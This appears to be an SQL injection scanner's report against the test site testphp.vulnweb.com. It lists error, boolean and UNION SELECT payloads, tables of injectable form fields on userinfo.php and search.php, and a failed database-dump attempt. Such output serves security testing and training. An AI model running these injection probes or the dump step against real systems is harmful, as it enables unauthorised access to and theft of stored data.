    -------------------- VULNERABILITY REPORT --------------------    


+--------------------------------------------------------------------
|                                                                    |
|  Target URL: http://testphp.vulnweb.com/login.php                  |
|                                                                    |
|  Request Method: POST                                              |
|                                                                    |
|  Crawl Depth: 0                                                    |
|                                                                    |
+--------------------------------------------------------------------


======================================================================
                         VULNERABILITY CHECK                          
======================================================================

=== Check: error, with: 

       -> '


=== Check: boolean, with: 

       -> 1' AND 1=1 --  
       -> 1' AND 1=2 -- 


=== Check: union, with: 

       -> ' UNION SELECT NULL --  
       -> ' UNION SELECT NULL, NULL --  
       -> ' UNION SELECT NULL, NULL, NULL --  
       -> ' UNION SELECT NULL, NULL, NULL, NULL --  
       -> ' UNION SELECT NULL, NULL, NULL, NULL, NULL -- 


== Form tested: userinfo.php

+-------+-------+---------+-------+
| Input | error | boolean | union |
+-------+-------+---------+-------+
| uname |   V   |         |   V   |
|  pass |   V   |         |   V   |
+-------+-------+---------+-------+


== Form tested: search.php?test=query

+-----------+-------+---------+-------+
|   Input   | error | boolean | union |
+-----------+-------+---------+-------+
| searchFor |       |    V    |       |
+-----------+-------+---------+-------+


======================================================================
                           DATA EXTRACTION                            
======================================================================

==> ENGINE: MySQL

==> TABLES

Error: The used SELECT statements have a different number of columns

==> COLUMNS

Error: The used SELECT statements have a different number of columns

==> FULL DUMP

Error: The used SELECT statements have a different number of columns

    ---------------------------- END ----------------------------     
